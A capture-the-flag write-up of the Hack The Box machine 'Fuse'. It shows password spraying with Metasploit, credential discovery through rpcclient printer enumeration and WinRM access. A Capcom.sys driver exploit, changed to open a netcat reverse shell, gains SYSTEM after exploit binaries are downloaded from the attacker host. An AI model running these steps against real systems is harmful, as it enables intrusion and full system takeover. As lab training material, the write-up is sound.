As with any box, I started Fuse with several portscans
root@kalivm:~/Fuse# nmap -oN fullscan-A -A 10.10.10.193 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 11:49 CEST Nmap scan report for 10.10.10.193 (10.10.10.193) Host is up (0.065s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-19 10:07:06Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEDC88B%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h37m01s, deviation: 4h02m39s, median: 16m55s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2020-06-19T03:07:43-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-19T10:07:42 |_ start_date: 2020-06-19T10:06:51 TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 14.40 ms 10.10.14.1 (10.10.14.1) 2 ... 21 22 897.73 ms 10.10.14.1 (10.10.14.1) 23 897.48 ms 10.10.14.1 (10.10.14.1) 24 897.31 ms 10.10.14.1 (10.10.14.1) 25 897.08 ms 10.10.14.1 (10.10.14.1) 26 ... 30 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 135.11 seconds
A standard windows domain-controller-like setup with ldap, smb but also port 80 for a web server. Using the regular options (enum4linux, ldapsearch) I did not yet get anything useful, so I decided to take a look at the website which appeared to be quite useful.
At first, when opening the IP Address in my browser, it immediately redirected to fuse.fabricorp.local. Since I did not have that entry yet in my hosts file, a page not found error occured.
After putting the hostname and IP address combination in the /etc/hosts file, the page did resolve and it showed a PaperCut Print Logger. Print servers are usually a nice goldmine of information, so it’s time to see if the CTF-Creator has replicated this experience.
The creator did a pretty good job. A nice combination of usernames to be found. And also one reference to a possible password. All even nicely exportable to CSV Files! After putting the usernames in a users file, and the Fabricorp01 as potential password in a passwords file, I decided to use msf to check if any of the username/password combinations would be useful.
root@kalivm:~/Fuse# msfconsole ---snip--- msf5 > search smb_login Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner msf5 > use 0 msf5 auxiliary(scanner/smb/smb_login) > set user_file users user_file => users msf5 auxiliary(scanner/smb/smb_login) > set pass_file passwords pass_file => passwords msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193 rhosts => 10.10.10.193 msf5 auxiliary(scanner/smb/smb_login) > run [*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01' [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:Fabricorp01', [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01' [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\pmerton:Fabricorp01', [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01' [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\administrator:Fabricorp01', [*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
This appeared to be the right approach as I now had at least 3 accounts which I could use, bnielson, tlavel and bhult.
root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193 Enter WORKGROUP\bnielson's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
However, for each of these users, I got a ‘password must change’ message, disallowing the login.
After some small search about how to change a windows password from a linux machine, I found that smbpasswd could do this.
root@kalivm:~/Fuse# smbpasswd -r 10.10.10.193 bnielson Old SMB password: New SMB password: Retype new SMB password: Password changed for user bnielson on 10.10.10.193.
So there I changed the password from Fabricorp01 to Fabricorp011 and it appeared succesful.
root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193 Enter WORKGROUP\bnielson's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share HP-MFT01 Printer HP-MFT01 IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers prnproc$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
After a quick check, it was successful indeed but after a minute or so, the password got back to the old ‘Password Must Change’ error again with the old password. Apparently, there’s a script running that resets the password so that other people on HTB can exploit the machine as well. A good thing, but quite annoying. After some searching around, I got kinda stuck and asked on Discord for a quick nudge where someone pointed me out to RPC as protocol. Since port 135 is open, this should have been obvious but to me it wasn’t (yet). So I decided to reset bnielson’s password once more (I was at Fabricorp019 already) and try rpc.
root@kalivm:~/Fuse# rpcclient -U bnielson 10.10.10.193 Enter WORKGROUP\bnielson's password: rpcclient $>
That worked too! Nice, but what can I do with this. Simply typing help already gave an extensive list of commands, including several ‘enum’ commands. Enumeration is always key, so I started with enumdomusers, to see if there were more accounts to be found.
rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3]
dmuir, astein, mberbatov, dandrews and two svc-accounts to be added to the list. Nice but smb_login did not give much more with the Fabricorp01 password. After some additional enumeration commands, I got to the enumprinters command.
rpcclient $> enumprinters flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:
With this command, a scan2docs password was displayed so I decide to run the smb_login check once more.
msf5 auxiliary(scanner/smb/smb_login) > run [*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1' [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bnielson:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\pmerton:$fab@s3Rv1ce$1', [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1' [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\dandrews:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\mberbatov:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\dmuir:$fab@s3Rv1ce$1', [-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\administrator:$fab@s3Rv1ce$1', [*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
And there I’ve got two additional accounts with the password in the enumprinters setting.
root@kalivm:~/Fuse# evil-winrm -u svc-print -i 10.10.10.193 Enter Password: Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint PS C:\Users\svc-print\Documents>
After some trial and error on various services, I finally found out that the svc-print account also provides access through win-rm. Perhaps this finally provides me with the user-flag.
PS C:\Users\svc-print\Documents> cd ../Desktop PS C:\Users\svc-print\Desktop> type user.txt 2edea93<NOFLAG>e4898c8621d2ed02d
And there’s the user flag, time for privilege escalation.
After obtaining the flag, I started browsing around the system but did not yet find much useful information. The normal privilege escalation analysis did not lead to anything exploitable and the only thing kinda worthwhile was a readme.txt file in the root of the system
PS C:\> cat readme.txt // MFT printing format issue note to HP engineer: The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used. This is a production environment and the "solution" should be developed and confirmed working in your testbed All changes will be reverted every 2 mins.
So apparently there is something to do with printer issues. However I got kinda stuck at this point, until someone on Discord nudged me to look closely at the whoami /all command output.
PS C:\test> whoami /all USER INFORMATION ---------------- User Name SID =================== ============================================== fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104 ---snip--- PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
At first, the output did not look all that useful, until I compared it to output on another windows box. It appeared that the SeLoadDriverPrivilege was added to the svc-print account. The first hit on google for exploiting these permissions, got me to this blogpost on tarlogic. In that blog post, both the EOPLoadDriver.exe and CapCom driver exploitation are linked which required compiling some c++ code. As I had not done this in a very long time (13+ years), I was kinda lost with the Visual Studio interface.
After watching some youtube videos and reading some docs, I finally managed to get the EoPLoadDriver.exe compiled. One of the most frustrating discoveries being that if you use existing code, Visual Studio completely ignores the files in the Project and only looks to its includes (such as stdafx.h) in the location of the original .cpp file.
I also analyzed the CapCom exploit and noticed it spawned a cmd-box on the original target. As I would not have a RDP Login on the machine, this would cause the exploit to be rather useless so I looked for alternative ways to use the exploit. During that research, I was also nudged towards this github page for the original CapCom.sys Exploit driver
After modifying both the commandline in order for it to call a nc.exe and get a reverse shell back to my own system. I also changed the createProcess call to use ‘CREATE_NO_WINDOW’ and not spawn a commandbox. I compiled that to another .exe too and transferred all files to my kali machine.
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/EOPL.exe -outfile EOPL.exe PS C:\test> powershell iwr -uri http://10.10.14.2:8000/Capcom.sys -outfile capcom.sys PS C:\test> powershell iwr -uri http://10.10.14.2:8000/ExploitCapcom.exe -outfile capcom.exe PS C:\test> powershell IWR -uri http://10.10.14.2:8000/windows/nc.exe -outfile c:\windows\temp\nc.exe
I transferred all files to the target system, knowing that the test directory could be used, I stored all, but the nc.exe file in that location.
PS C:\test> ./EOPL.exe System\CurrentControlSet\MyService c:\test\capcom.sys [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService NTSTATUS: 00000000, WinError: 0
I ran the EOPL.exe with the capcom.sys file and after several attempts, finally noticed it state NTSTATUS: 00000000, meaning all had gone well. (I had seen various errors which are all nicely explained by Microsoft here)
PS C:\test> .\capcom.exe [*] Capcom.sys exploit [*] Capcom.sys handle was obtained as 0000000000000064 [*] Shellcode was placed at 000001D6EAF70008 [+] Shellcode was executed [+] Token stealing was successful [+] The SYSTEM shell was launched [*] Press any key to exit this program
I ran the exploit with a listener ready in another terminal, and as this text scrolled by, in the other Terminal I noticed this:
root@kalivm:~/Fuse# rlwrap nc -nlvp 9000 Listening on 0.0.0.0 9000 Connection received on 10.10.10.193 54788 Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\test>
So now I’ve got a shell using the exploit, but I still have to verify if the exploit was successful.
PS C:\test> whoami whoami nt authority\system
Those are the highest privileges possible, all that is left, is to obtain the flag!
PS C:\test> cd c:\Users\Administrator\Desktop cd c:\Users\Administrator\Desktop PS C:\Users\Administrator\Desktop> type root.txt type root.txt c05c1df<NOFLAG>808892ff741e42890